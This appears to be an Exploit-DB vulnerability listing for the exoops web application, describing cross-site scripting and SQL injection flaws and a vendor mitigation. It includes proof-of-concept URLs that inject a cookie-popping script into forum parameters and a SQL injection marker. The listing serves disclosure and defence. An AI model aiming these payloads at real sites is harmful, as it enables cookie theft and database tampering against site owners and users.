header-logo
Suggest Exploit
vendor:
exoops
by:
Unknown
7.5
CVSS
HIGH
Input Validation
20
CWE
Product Name: exoops
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:exoops:exoops
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Input Validation Vulnerabilities in exoops

Multiple input validation vulnerabilities affect exoops, allowing attackers to carry out cross-site scripting and SQL injection attacks. This can lead to theft of authentication credentials, destruction or disclosure of sensitive data, and other potential attacks.

Mitigation:

The vendor should update exoops to properly sanitize user-supplied input before using it in critical actions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12915/info

Multiple input validation vulnerabilities reportedly affect exoops. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.

An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks. 

http://www.example.com/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai
Pops cookie
http://www.example.com/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EPops cookie
http://www.example.com/modules/newbb/index.php?viewcat='SQL_INJECTION
http://www.example.com/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9 
cqrsecured